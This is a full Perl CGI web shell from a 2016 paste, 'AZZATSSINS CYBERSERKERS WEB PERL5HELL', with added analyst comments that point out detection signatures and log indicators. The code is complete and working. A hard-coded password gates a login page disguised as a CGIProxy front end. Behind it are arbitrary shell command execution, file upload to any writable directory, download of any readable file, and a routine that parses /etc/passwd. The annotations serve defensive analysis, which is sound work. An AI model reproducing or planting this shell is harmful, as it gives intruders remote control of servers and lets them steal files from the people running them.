EddieKidiw

Perl AZZATSSINS CYBERSERKERS WEB PERL5HELL

Mar 13th, 2016
  1. #!/usr/bin/perl -I/usr/local/bandmin
     # Analyst summary: the rest of this listing is a password-gated CGI web
     # shell (command execution, file upload, file download). The package
     # globals below configure it; the file has no `use strict` / `use warnings`.
     # Separators used when chaining `cd <dir>` with the requested command.
  2. $NTCmdSep = "&";
  3. $UnixCmdSep = ";";
     # Seconds handed to alarm() in ExecuteCommand before CommandTimeout fires.
  4. $CommandTimeoutDuration = 300;
     # Non-zero selects the piped-open (streaming) branch in ExecuteCommand.
  5. $ShowDynamicOutput = 1;
     # Hard-coded shared secret: compared with form field 'p' in PerformLogin and
     # with the SAVEDPWD cookie in the dispatcher at the end of the file. A
     # constant like this is a usable static signature for this sample.
  6. $azzatssins = "AZ404";
     # $WinNT is not assigned anywhere in the visible listing, so each ternary
     # below evaluates to its second (Unix) value.
  7. $CmdSep = ($WinNT ? $NTCmdSep : $UnixCmdSep);
  8. $CmdPwd = ($WinNT ? "cd" : "pwd");
  9. $PathSep = ($WinNT ? "\\" : "/");
     # Suffix appended to every non-cd command line built in ExecuteCommand.
  10. $Redirector = ($WinNT ? " 2>&1 1>&2" : " 1>&1 2>&1");
  11. sub ReadParse
  12. {
      # Parses the CGI request into the package hash %in (plus $in / @in).
      # Three input shapes are handled: GET query string, url-encoded POST
      # body, and a multipart/form-data POST whose first part is a file.
      # Everything stored in %in is client-controlled and is later used as
      # password, command text, directory and file name by the dispatcher.
      # If an argument is passed, the glob *in is aliased to it; the call at
      # the bottom of the file passes none, so the package variables are used.
  13. local (*in) = @_ if @_;
  14. local ($i, $loc, $key, $val);
  15.  
      # Scalar-context match result: true when the Content-Type is multipart.
  16. $MultipartFormData = $ENV{'CONTENT_TYPE'} =~ /multipart\/form-data; boundary=(.+)$/;
  17.  
  18. if($ENV{'REQUEST_METHOD'} eq "GET")
  19. {
  20. $in = $ENV{'QUERY_STRING'};
  21. }
  22. elsif($ENV{'REQUEST_METHOD'} eq "POST")
  23. {
      # Note `&` is the bitwise operator here, not logical `&&`.
  24. binmode(STDIN) if $MultipartFormData & $WinNT;
      # Reads exactly CONTENT_LENGTH bytes of body; no size cap is applied.
  25. read(STDIN, $in, $ENV{'CONTENT_LENGTH'});
  26. }
  27. if($ENV{'CONTENT_TYPE'} =~ /multipart\/form-data; boundary=(.+)$/)
  28. {
      # The boundary comes from the request header and is interpolated into
      # the split pattern as a regex, without quotemeta.
  29. $Boundary = '--'.$1;
  30. @list = split(/$Boundary/, $in);
      # Only the first part ($list[1]) is treated as the uploaded file.
  31. $HeaderBody = $list[1];
      # Split the part at the first blank line: prematch is the part header,
      # postmatch is the file content.
  32. $HeaderBody =~ /\r\n\r\n|\n\n/;
  33. $Header = $`;
  34. $Body = $';
  35. $Body =~ s/\r\n$//;
      # Raw uploaded bytes; written to disk by UploadFile.
  36. $in{'filedata'} = $Body;
      # Client-supplied filename from the part header, with quotes and all
      # whitespace removed, stored under the same key ('f') that the
      # download path uses.
  37. $Header =~ /filename=\"(.+)\"/;
  38. $in{'f'} = $1;
  39. $in{'f'} =~ s/\"//g;
  40. $in{'f'} =~ s/\s//g;
  41.  
  42. # parse trailer
      # Remaining parts are ordinary form fields: the first quoted \w+ token
      # is the field name, the text after it (trimmed of surrounding line
      # breaks, then percent-decoded) is the value.
  43. for($i=2; $list[$i]; $i++)
  44. {
  45. $list[$i] =~ s/^.+name=$//;
  46. $list[$i] =~ /\"(\w+)\"/;
  47. $key = $1;
  48. $val = $';
  49. $val =~ s/(^(\r\n\r\n|\n\n))|(\r\n$|\n$)//g;
  50. $val =~ s/%(..)/pack("c", hex($1))/ge;
  51. $in{$key} = $val;
  52. }
  53. }
  54. else # standard post data (url encoded, not multipart)
  55. {
      # Classic url-decoding: split pairs on '&', turn '+' into space, split
      # name/value on the first '=', percent-decode both. A repeated key has
      # its values joined with a NUL byte.
  56. @in = split(/&/, $in);
  57. foreach $i (0 .. $#in)
  58. {
  59. $in[$i] =~ s/\+/ /g;
  60. ($key, $val) = split(/=/, $in[$i], 2);
  61. $key =~ s/%(..)/pack("c", hex($1))/ge;
  62. $val =~ s/%(..)/pack("c", hex($1))/ge;
  63. $in{$key} .= "\0" if (defined($in{$key}));
  64. $in{$key} .= $val;
  65. }
  66. }
  67. }
  68.  
  69. sub foo
  70. {
      # Reads /etc/passwd and returns a hash reference keyed by login name,
      # each entry holding that account's uid, gid and home directory.
      # The password, gecos and shell fields are parsed but not stored.
      # Nothing in the visible listing calls this sub.
  71. my ( $login, $p, $uid, $gid, $gecos, $dir, $s );
  72.  
  73. my %HoH = ();
  74.  
  75. my $file = '/etc/passwd';
      # Two-argument open on a bareword handle; the path is a fixed constant.
  76. open( PASSWD, "< $file" ) or die "Can't open $file : $!";
  77.  
  78. while( <PASSWD> ) {
      # split with no second argument operates on $_ (the current line).
  79. ( $login, $p, $uid, $gid, $gecos, $dir, $s ) = split( ':' );
  80.  
  81. $HoH{ $login }{ 'uid' } = $uid;
  82. $HoH{ $login }{ 'gid' } = $gid;
  83. $HoH{ $login }{ 'dir' } = $dir;
  84. }
  85.  
  86. close PASSWD;
  87.  
  88. return \%HoH;
  89. }
  90. sub PrintPageHeader
  91. {
      # Emits the CGI Content-type header and a single <meta> tag, and sets
      # the global $EncodedCurrentDir used in links by the form-printing subs.
      # Callers pass "p", "c" or "f", but this sub never reads its argument.
      # The meta description value is a constant sent with every HTML
      # response, which makes it a candidate response-body signature.
      # Percent-encode every non-alphanumeric character of $CurrentDir as hex.
  92. $EncodedCurrentDir = $CurrentDir;
  93. $EncodedCurrentDir =~ s/([^a-zA-Z0-9])/'%'.unpack("H*",$1)/eg;
  94. print "Content-type: text/html\n\n";
  95. print <<END;
  96. <meta content=PERLWEB5SHELL-BY-AZZATSSINS-CYBERSERKERS name=description>
  97. END
  98. }
  99.  
  100. sub PrintLoginScreen
  101. {
       # Prints the global $Message followed by a newline. $Message is set
       # with q// using `$` as the delimiter, and its content is just the
       # line break between the two delimiters, so no visible banner is sent.
  102. $Message = q$
  103. $;
       # The next line is a comment containing only a single quote.
  104. #'
  105. print <<END;
  106. $Message
  107. END
  108. }
  109. sub PrintLoginFailedMessage
  110. {
       # Prints a fixed HTML fragment. PerformLogin calls this only when a
       # non-empty password was submitted and did not match.
  111. print <<END;
  112. <code>
  113. <center><br>WHAT THE HELL ARE YOU DOING...!!!<br>
  114. </center>
  115. </code>
  116. END
  117. }
  118.  
  119. sub PrintLoginForm
  120. {
       # Prints the login page. The markup presents itself as a "CGIProxy"
       # start page (title, heading, option checkboxes), but the form posts
       # a=login plus a text field named "p" to $ScriptLocation, and "p" is
       # what the dispatcher reads as the password. The checkbox fields
       # (rc, rs, fa, br, if) are not read by any code in this listing.
       # For triage: the page shown to an unauthenticated visitor looks like
       # a proxy front end, so the title alone does not identify the script;
       # the fixed strings, mail address and link targets below are constant
       # across responses.
       # $ScriptLocation is interpolated by the heredoc; the rest is literal.
  121. print <<END;
  122. <code>
  123. <html>
  124. <head>
  125. <title>Start Using CGIProxy</title>
  126. </head>
  127. <body onload="document.URLform.URL.focus() ; if (document.URLform.URL.value.match(/^\x01/)) document.URLform.URL.value= _proxy_jslib_wrap_proxy_decode(document.URLform.URL.value.replace(/\x01/, ''))">
  128. <p>
  129.  
  130. <h1>CGIProxy</h1>
  131. <p>Start browsing through this CGI-based proxy by entering a URL below.
  132. Only HTTP and FTP URLs are supported. Not all functions will work
  133. (e.g. some Java applets), but most pages will be fine.
  134.  
  135. <form name="f" method="POST" action="$ScriptLocation">
  136. <input type="hidden" name="a" value="login"><input name="p" size=66 value="">
  137. <br><input type=checkbox id="rc" name="rc"><label for="rc"> Remove all cookies (except certain proxy cookies)</label>
  138. <br><input type=checkbox id="rs" name="rs"><label for="rs"> Remove all scripts (recommended for anonymity)</label>
  139. <br><input type=checkbox id="fa" name="fa"><label for="fa"> Remove ads</label>
  140. <br><input type=checkbox id="br" name="br"><label for="br"> Hide referrer information</label>
  141. <br><input type=checkbox id="if" name="if" checked><label for="if"> Show URL entry form</label>
  142.  
  143. <p><input type=submit value=" Begin browsing ">
  144. </form>
  145.  
  146. <h3><a href="mailto:cyberserkers@gmail.com">Manage cookies</a></h3>
  147. <p>
  148. <hr>
  149. <table width="100%"><tr>
  150. <td align=left>
  151. <i><a href="http://wget.yu.tl">CGIProxy 2.1.10</a>
  152. (<a href="http://azzatssinz.tumblr.com">download</a>)</i>
  153. </td>
  154. <td align=right>
  155. <a href="http://azzatssinz.tumblr.com"><i>Restart</i></a>
  156. </td>
  157. </tr></table>
  158. <p>
  159. </body>
  160. </html>
  161. </code>
  162. END
  163. }
  164. sub PrintPageFooter
  165. {
       # Closes the HTML document; called last by every page-producing sub.
  166. print "</font></body></html>";
  167. }
  168.  
  169. sub GetCookies
  170. {
       # Fills the package hash %Cookies from the request's Cookie header
       # (HTTP_COOKIE), splitting pairs on "; " and name/value on "=".
       # Because split is given no limit, a value that itself contains "="
       # keeps only the text up to that "=".
       # The dispatcher reads $Cookies{'SAVEDPWD'} as the session credential.
  171. @httpcookies = split(/; /,$ENV{'HTTP_COOKIE'});
  172. foreach $cookie(@httpcookies)
  173. {
  174. ($id, $val) = split(/=/, $cookie);
  175. $Cookies{$id} = $val;
  176. }
  177. }
  178.  
  179. sub PrintLogoutScreen
  180. {
       # Prints a fixed logout notice that links to an external site.
  181. print "<code><center><a href=http://azzatssinz.tumblr.com>LogOut Success...</a></center><br><br></code>";
  182. }
  183.  
  184. sub PerformLogout
  185. {
       # Clears the session by sending an empty SAVEDPWD cookie, then renders
       # the login page again. The Set-Cookie line is printed before
       # PrintPageHeader emits the Content-type header, so it lands in the
       # response headers.
  186. print "Set-Cookie: SAVEDPWD=;\n"; # remove password cookie
  187. &PrintPageHeader("p");
  188. &PrintLogoutScreen;
  189. &PrintLoginScreen;
  190. &PrintLoginForm;
  191. &PrintPageFooter;
  192. }
  193.  
  194. sub PerformLogin
  195. {
       # Checks the submitted password (global $LoginPassword, taken from form
       # field 'p') against the hard-coded $azzatssins and renders either the
       # command form or the login page.
       # On success the cookie value is the password itself, set with no
       # attributes (no expiry, Secure or HttpOnly are written). Every later
       # request therefore carries the plaintext secret in its Cookie header,
       # which is where it will appear in proxy captures or in web logs that
       # record cookies.
  196. if($LoginPassword eq $azzatssins) # password matched
  197. {
  198. print "Set-Cookie: SAVEDPWD=$LoginPassword;\n";
  199. &PrintPageHeader("c");
  200. &PrintCommandLineInputForm;
  201. &PrintPageFooter;
  202. }
  203. else # password didn't match
  204. {
  205. &PrintPageHeader("p");
  206. &PrintLoginScreen;
       # The failure banner is shown only for a non-empty wrong password; a
       # first visit (no 'p' field) just gets the form.
  207. if($LoginPassword ne "") # some password was entered
  208. {
  209. &PrintLoginFailedMessage;
  210. }
  211. &PrintLoginForm;
  212. &PrintPageFooter;
  213. }
  214. }
  215.  
  216. sub PrintCommandLineInputForm
  217. {
       # Prints the command-entry form: hidden a=command, hidden d=<current
       # directory>, and a text field "c" that the dispatcher reads as the
       # command to run. The form posts back to $ScriptLocation.
       # $CurrentDir, $ServerName and $EncodedCurrentDir are interpolated into
       # the HTML without escaping. The <img> points at a third-party host, so
       # a browser rendering this page makes an outbound request for it.
       # $Prompt is a global; with $WinNT unset the second form is used.
  218. $Prompt = $WinNT ? "$CurrentDir> " : "[admin\@$ServerName $CurrentDir]\ ";
  219. print <<END;
  220. <code>
  221. <title>.: AZZATSSINS CYBERSERKERS WEB PERL5HELL :.</title><body bgcolor=silver>
  222. <center><a href="$ScriptLocation?a=upload&d=$EncodedCurrentDir"><img src=https://lh3.googleusercontent.com/-qg8PY7S9LsM/VtENkUuLg8I/AAAAAAAAAPE/7PnXFF4-3n0/w480-h480/AZZATSSINS.png><br></a><br><font color=silver>=====================</font><br><br><form name="f" method="POST" action="$ScriptLocation">
  223. <input type="hidden" name="a" value="command">
  224. <input type="hidden" name="d" value="$CurrentDir">
  225. <b><i><font color="red">$Prompt</font>
  226. </i></b><br>
  227. <input type="text" name="c" size="25">
  228. <input type="submit" value="Enter">
  229. </form>
  230. </center>
  231. </code>
  232.  
  233. END
  234. }
  235.  
  236. sub PrintFileDownloadForm
  237. {
       # Prints the download form: hidden d=<current directory>, hidden
       # a=download, and a text field "f" for the file name, posted to
       # $ScriptLocation. $CurrentDir is written into the page unescaped.
       # The <img> is loaded from a third-party host.
  238. $Prompt = $WinNT ? "$CurrentDir> " : "[admin\@$ServerName $CurrentDir]\ ";
  239. print <<END;
  240. <code>
  241. <title>.: AZZATSSINS CYBERSERKERS WEB PERL5HELL :.</title><body bgcolor=silver>
  242. <center><img src=http://s28.postimg.org/tixvhu6nx/narsis.png><br>
  243. <font color=lime><b><i><form name="f" method="POST" action="$ScriptLocation">
  244. <input type="hidden" name="d" value="$CurrentDir">
  245. <input type="hidden" name="a" value="download">
  246. $Prompt download<br><br>
  247. Filename: <input type="text" name="f" size="35"><br><br>
  248. Download: <input type="submit" value="Begin">
  249. </form>
  250. </i></b></font></center>
  251. </code>
  252. END
  253. }
  254.  
  255. sub PrintFileUploadForm
  256. {
       # Prints the multipart upload form: file field "f", checkbox "o" with
       # value "overwrite", hidden d=<current directory> and hidden a=upload,
       # posted to $ScriptLocation. Also prints the Home / Download File /
       # Logout navigation links (a=download, a=logout).
       # $CurrentDir and $EncodedCurrentDir are written into the page unescaped.
  257. $Prompt = $WinNT ? "$CurrentDir> " : "[admin\@$ServerName $CurrentDir]\ ";
  258. print <<END;
  259. <code>
  260. <title>.: AZZATSSINS CYBERSERKERS WEB PERL5HELL :.</title><body bgcolor=silver>
  261. <center><img src=https://lh3.googleusercontent.com/-qg8PY7S9LsM/VtENkUuLg8I/AAAAAAAAAPE/7PnXFF4-3n0/w480-h480/AZZATSSINS.png><br>
  262. <font color="lime"><b><i>[<a href="$ScriptLocation?">Home</a>] [<a href="$ScriptLocation?a=download&d=$EncodedCurrentDir">Download File</a>] [<a href="$ScriptLocation?a=logout">Logout</a>
  263. ]</i></b></font><br><font color=lime><b><i><form name="f" enctype="multipart/form-data" method="POST" action="$ScriptLocation">
  264. $Prompt upload<br><br>
  265. Filename: <input type="file" name="f" size="35"><br><br>
  266. Options: <input type="checkbox" name="o" value="overwrite">
  267. Overwrite if it Exists<br><br>
  268. Upload: <input type="submit" value="Begin">
  269. <input type="hidden" name="d" value="$CurrentDir">
  270. <input type="hidden" name="a" value="upload">
  271. </form></i></b></font>
  272. </center>
  273. </code>
  274. END
  275. }
  276.  
  277. sub CommandTimeout
  278. {
       # SIGALRM handler installed by ExecuteCommand. When $WinNT is false it
       # cancels the alarm, prints a timeout notice, re-prints the command
       # form and footer, and exits the CGI process. When $WinNT is true it
       # does nothing.
       # NOTE(review): the message says "Killed it!", but this handler only
       # calls exit; no kill() appears in the listing, so whether the spawned
       # command also stops is not established here.
  279. if(!$WinNT)
  280. {
  281. alarm(0);
  282. print <<END;
  283. </xmp>
  284. <code>
  285. Command exceeded maximum time of $CommandTimeoutDuration second(s).
  286. <br>Killed it!
  287. <code>
  288. END
  289. &PrintCommandLineInputForm;
  290. &PrintPageFooter;
  291. exit;
  292. }
  293. }
  294. sub ExecuteCommand
  295. {
       # Runs the operator's command (global $RunCommand, from form field 'c')
       # in the directory $CurrentDir (from form field 'd') and writes the
       # result into the page. Both values are concatenated into one command
       # string that Perl hands to the system shell, so whatever arrives in
       # those fields is executed with the privileges of the CGI process.
       # On a host this appears as the web server's CGI process spawning a
       # shell whose command line starts with `cd "<dir>"` followed by the
       # separator, a useful process-lineage pattern to alert on.
  296. if($RunCommand =~ m/^\s*cd\s+(.+)/) # it is a change dir command
  297. {
  298.  
       # cd is emulated: run `cd "<old>"`, then `cd <arg>`, then the pwd
       # command, and keep the printed directory (last character chopped)
       # as the new $CurrentDir. The state is carried between requests only
       # through the hidden "d" form field.
  299. $OldDir = $CurrentDir;
  300. $Command = "cd \"$CurrentDir\"".$CmdSep."cd $1".$CmdSep.$CmdPwd;
  301. chop($CurrentDir = `$Command`);
  302. &PrintPageHeader("c");
  303. &PrintCommandLineInputForm;
  304. print "<div style='float: center; text-align: left;'>";
  305. $Prompt = $WinNT ? "$OldDir> " : "[admin\@$ServerName $OldDir]\ ";
  306. print "<code><center><font color=violet><b><i>$Prompt <br> $RunCommand</i></b></font></center></code>";
  307. }
  308. else # some other command, display the output
  309. {
  310. &PrintPageHeader("c");
  311. &PrintCommandLineInputForm;
  312. print "<div style='float: center; text-align: left;'>";
  313. $Prompt = $WinNT ? "$CurrentDir> " : "[admin\@$ServerName $CurrentDir]\ ";
       # The command text is echoed into the page without HTML escaping;
       # output that follows is wrapped in <xmp>.
  314. print "<code><center><font color=violet><b><i>$Prompt <br> $RunCommand<br></i></b></font></center></code><xmp style='color: #00FF00;'>";
  315. $Command = "cd \"$CurrentDir\"".$CmdSep.$RunCommand.$Redirector;
       # Arm the timeout: CommandTimeout runs after $CommandTimeoutDuration
       # seconds unless alarm(0) below is reached first.
  316. if(!$WinNT)
  317. {
  318. $SIG{'ALRM'} = \&CommandTimeout;
  319. alarm($CommandTimeoutDuration);
  320. }
  321. if($ShowDynamicOutput) # show output as it is generated
  322. {
       # Unbuffer STDOUT, then use a two-argument open with a trailing " |"
       # so Perl starts the command and exposes its output as a filehandle.
       # The open result is not checked.
  323. $|=1;
  324. $Command .= " |";
  325. open(CommandOutput, $Command);
  326. while(<CommandOutput>)
  327. {
  328. $_ =~ s/(\n|\r\n)$//;
  329. print "$_\n";
  330. }
  331. $|=0;
  332. }
  333. else # show output after command completes
  334. {
       # Inside a double-quoted string the backticks are literal characters:
       # this prints the $Command text wrapped in backticks.
  335. print "<code><center><b><i><font color=orange> `$Command` </font></i></b></center></code>";
  336. }
  337. if(!$WinNT)
  338. {
  339. alarm(0);
  340. }
  341. print "</xmp>";
  342. }
  343. print "</div>";
  344. &PrintPageFooter;
  345. }
  346.  
  347. sub PrintDownloadLinkPage
  348. {
       # Given a server-side path, prints either a page linking to the actual
       # download request (a=download, f=<encoded path>, o=go) or, when the
       # path does not exist, an error plus the download form.
       # Argument: the resolved path built by DownloadFile / BeginDownload.
  349. local($FileUrl) = @_;
  350. if(-e $FileUrl) # if the file exists
  351. {
  352. # encode the file link so we can send it to the browser
  353. $FileUrl =~ s/([^a-zA-Z0-9])/'%'.unpack("H*",$1)/eg;
  354. $DownloadLink = "$ScriptLocation?a=download&f=$FileUrl&o=go";
       # $HtmlMetaHeader is assigned here, but no sub in the visible listing
       # prints it.
  355. $HtmlMetaHeader = "<meta HTTP-EQUIV=\"Refresh\" CONTENT=\"1; URL=$DownloadLink\">";
  356. &PrintPageHeader("c");
  357. print <<END;
  358. <code>
  359. Sending File $TransferFile...<br>
  360. If the download does not start automatically,
  361. <a href="$DownloadLink">Click Here</a>.
  362. </code>
  363. END
  364. &PrintCommandLineInputForm;
  365. &PrintPageFooter;
  366. }
  367. else # file doesn't exist
  368. {
  369. &PrintPageHeader("f");
       # The requested path and the OS error text are echoed unescaped.
  370. print "<code>Failed to download $FileUrl: $!</code>";
  371. &PrintFileDownloadForm;
  372. &PrintPageFooter;
  373. }
  374. }
  375.  
  376. sub SendFileToBrowser
  377. {
       # Streams a server-side file to the client as an attachment. The path
       # is the one DownloadFile / BeginDownload built from request fields
       # 'f' and 'd'; no directory restriction is applied anywhere, so any
       # file the CGI process can read can be returned.
       # For detection: a successful response has no HTML header at all,
       # only Content-Type application/x-unknown with a Content-Disposition
       # attachment, returned by a CGI script.
  378. local($SendFile) = @_;
       # Two-argument open: no explicit read mode is given for the path.
  379. if(open(SENDFILE, $SendFile)) # file opened for reading
  380. {
  381. if($WinNT)
  382. {
  383. binmode(SENDFILE);
  384. binmode(STDOUT);
  385. }
       # Element 7 of stat() is the size in bytes.
  386. $FileSize = (stat($SendFile))[7];
       # Copies the path into $Filename and matches the final path component
       # (after the last / or \); that capture ($1) is what the header uses.
  387. ($Filename = $SendFile) =~ m!([^/^\\]*)$!;
  388. print "Content-Type: application/x-unknown\n";
  389. print "Content-Length: $FileSize\n";
  390. print "Content-Disposition: attachment; filename=$1\n\n";
  391. print while(<SENDFILE>);
  392. close(SENDFILE);
  393. }
  394. else # failed to open file
  395. {
  396. &PrintPageHeader("f");
  397. print "<code>Failed to download $SendFile: $!</code>";
  398. &PrintFileDownloadForm;
  399. &PrintPageFooter;
  400. }
  401. }
  402.  
  403.  
  404. sub BeginDownload
  405. {
       # Resolves $TransferFile to a full path and either streams it or shows
       # the link page. The body matches the second half of DownloadFile
       # (without the empty-name check); nothing in the visible listing
       # calls this sub.
  406. # get fully qualified path of the file to be downloaded
       # `&` and `|` here are bitwise operators applied to the match results.
  407. if(($WinNT & ($TransferFile =~ m/^\\|^.:/)) |
  408. (!$WinNT & ($TransferFile =~ m/^\//))) # path is absolute
  409. {
  410. $TargetFile = $TransferFile;
  411. }
  412. else # path is relative
  413. {
       # Start from $CurrentDir, dropping one trailing slash/backslash, then
       # append the requested name.
  414. chop($TargetFile) if($TargetFile = $CurrentDir) =~ m/[\\\/]$/;
  415. $TargetFile .= $PathSep.$TransferFile;
  416. }
  417.  
  418. if($Options eq "go") # we have to send the file
  419. {
  420. &SendFileToBrowser($TargetFile);
  421. }
  422. else # we have to send only the link page
  423. {
  424. &PrintDownloadLinkPage($TargetFile);
  425. }
  426. }
  427.  
  428. sub UploadFile
  429. {
       # Writes the uploaded bytes ($in{'filedata'}, filled by ReadParse) to
       # <$CurrentDir>/<final component of the client file name>. The target
       # directory comes from request field 'd', so the write can land
       # anywhere the CGI process has write permission.
       # For detection: new or modified files owned by the web server account
       # outside its normal upload locations, following a multipart POST to
       # this script with a=upload.
  430. # if no file is specified, print the upload form again
  431. if($TransferFile eq "")
  432. {
  433. &PrintPageHeader("f");
  434. &PrintFileUploadForm;
  435. &PrintPageFooter;
  436. return;
  437. }
  438. &PrintPageHeader("c");
  439.  
  440. # start the uploading process
       # File name and directory are echoed into the page unescaped.
  441. print "<code>Uploading $TransferFile to $CurrentDir...<br>";
  442.  
  443. # get the fullly qualified pathname of the file to be created
       # Take $CurrentDir without one trailing slash/backslash, then append
       # only the last path component of the client-supplied name.
  444. chop($TargetName) if ($TargetName = $CurrentDir) =~ m/[\\\/]$/;
  445. $TransferFile =~ m!([^/^\\]*)$!;
  446. $TargetName .= $PathSep.$1;
  447.  
  448. $TargetFileSize = length($in{'filedata'});
  449. # if the file exists and we are not supposed to overwrite it
  450. if(-e $TargetName && $Options ne "overwrite")
  451. {
  452. print "Failed: Destination file already exists.<br>";
  453. }
  454. else # file is not present
  455. {
       # Two-argument open with the mode prefixed to the path; an existing
       # file is truncated when o=overwrite was sent.
  456. if(open(UPLOADFILE, ">$TargetName"))
  457. {
  458. binmode(UPLOADFILE) if $WinNT;
       # The results of print and close are not checked.
  459. print UPLOADFILE $in{'filedata'};
  460. close(UPLOADFILE);
  461. print "Transfered $TargetFileSize Bytes.<br>";
  462. print "File Path: $TargetName<br>";
  463. }
  464. else
  465. {
  466. print "Failed: $!<br>";
  467. }
  468. }
  469. print "</code>";
  470. &PrintCommandLineInputForm;
  471. &PrintPageFooter;
  472. }
  473.  
  474. sub DownloadFile
  475. {
       # Handler for a=download. With no file name it re-prints the form;
       # otherwise it resolves $TransferFile (form field 'f') to a full path
       # and, depending on field 'o', either streams the file (o=go) or
       # prints the intermediate link page. Absolute paths are accepted
       # as-is and relative ones are joined to $CurrentDir; there is no
       # restriction on which directory the result may point into.
  476. # if no file is specified, print the download form again
  477. if($TransferFile eq "")
  478. {
  479. &PrintPageHeader("f");
  480. &PrintFileDownloadForm;
  481. &PrintPageFooter;
  482. return;
  483. }
  484.  
  485. # get fully qualified path of the file to be downloaded
       # `&` and `|` here are bitwise operators applied to the match results.
  486. if(($WinNT & ($TransferFile =~ m/^\\|^.:/)) |
  487. (!$WinNT & ($TransferFile =~ m/^\//))) # path is absolute
  488. {
  489. $TargetFile = $TransferFile;
  490. }
  491. else # path is relative
  492. {
  493. chop($TargetFile) if($TargetFile = $CurrentDir) =~ m/[\\\/]$/;
  494. $TargetFile .= $PathSep.$TransferFile;
  495. }
  496.  
  497. if($Options eq "go") # we have to send the file
  498. {
  499. &SendFileToBrowser($TargetFile);
  500. }
  501. else # we have to send only the link page
  502. {
  503. &PrintDownloadLinkPage($TargetFile);
  504. }
  505. }
  506.  
  507. &ReadParse;
  508. &GetCookies;
  509.  
       # Request dispatcher. Field map, all client-supplied via %in:
       #   a = action, p = password, c = command, f = file name,
       #   o = option ("go" / "overwrite"), d = working directory.
       # Together with the SAVEDPWD cookie these names are the request-side
       # indicators for this script in access logs and proxy captures; POST
       # bodies are usually not logged, so the GET links (a=upload,
       # a=download, a=logout) are the ones most likely to be visible.
  510. $ScriptLocation = $ENV{'SCRIPT_NAME'};
  511. $ServerName = $ENV{'SERVER_NAME'};
  512. $LoginPassword = $in{'p'};
  513. $RunCommand = $in{'c'};
  514. $TransferFile = $in{'f'};
  515. $Options = $in{'o'};
  516.  
  517. $Action = $in{'a'};
  518. $Action = "login" if($Action eq ""); # no action specified, use default
  519.  
  520. # get the directory in which the commands will be executed
       # When 'd' is absent the pwd command is run via backticks, so even a
       # plain unauthenticated page view spawns one child process.
  521. $CurrentDir = $in{'d'};
  522. chop($CurrentDir = `$CmdPwd`) if($CurrentDir eq "");
  523.  
       # Authentication is a string comparison of the cookie with the
       # hard-coded password; there is no session identifier or server-side
       # state.
  524. $LoggedIn = $Cookies{'SAVEDPWD'} eq $azzatssins;
  525.  
       # Any action other than login is reached only when the cookie matched.
  526. if($Action eq "login" || !$LoggedIn) # user needs/has to login
  527. {
  528. &PerformLogin;
  529. }
  530. elsif($Action eq "command") # user wants to run a command
  531. {
  532. &ExecuteCommand;
  533. }
  534. elsif($Action eq "upload") # user wants to upload a file
  535. {
  536. &UploadFile;
  537. }
  538. elsif($Action eq "download") # user wants to download a file
  539. {
  540. &DownloadFile;
  541. }
  542. elsif($Action eq "logout") # user wants to logout
  543. {
  544. &PerformLogout;
  545. }